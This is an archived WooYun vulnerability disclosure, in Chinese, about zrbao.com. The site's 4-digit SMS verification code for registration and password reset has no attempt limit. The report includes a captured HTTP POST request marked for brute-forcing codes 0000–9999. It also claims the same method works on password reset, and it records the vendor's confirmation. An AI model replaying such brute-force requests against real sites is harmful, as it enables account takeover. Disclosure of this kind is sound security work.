乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-30: 细节已通知厂商并且等待厂商处理中 2015-12-02: 厂商已经确认,细节仅向厂商公开 2015-12-12: 细节向核心白帽子及相关领域专家公开 2015-12-22: 细节向普通白帽子公开 2016-01-01: 细节向实习白帽子公开 2016-01-16: 细节向公众公开
漏洞列表里一个漏洞都没有,第一个漏洞给20RANK吧。
注册及重置密码所所获取的手机验证码为4位,且对次数无限制。验证码:
输入任意验证码,提交时抓包:遍历验证码0000-9999
POST /User/phoneReg.shtml HTTP/1.1Host: www.zrbao.comUser-Agent: rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: https://www.zrbao.com/reg.shtmlContent-Length: 221Cookie: JSESSIONID=92A2B6CDE6365F56B2AC5EF383E8BAD6-n1; Hm_lvt_b4e112a89209d15dd495141817984363=1448863648; Hm_lpvt_b4e112a89209d15dd495141817984363=1448863666Connection: keep-alivePragma: no-cacheCache-Control: no-cachejsonDataSet=%7B%22phone%22%3A%2213333333333%22%2C%22imgCode%22%3A%22afdq%22%2C%22phoneCode%22%3A%22§9999§%22%2C%22pwd%22%3A%22********%22%2C%22recommendUid%22%3A%22%22%2C%22isCheck%22%3Atrue%2C%22logType%22%3A%22web%22%7D
注册成功
登陆:
同理忘记密码处:
你们懂的
危害等级:中
漏洞Rank:6
确认时间:2015-12-02 11:39
短信服务已经拆分,内部限制没有展示
暂无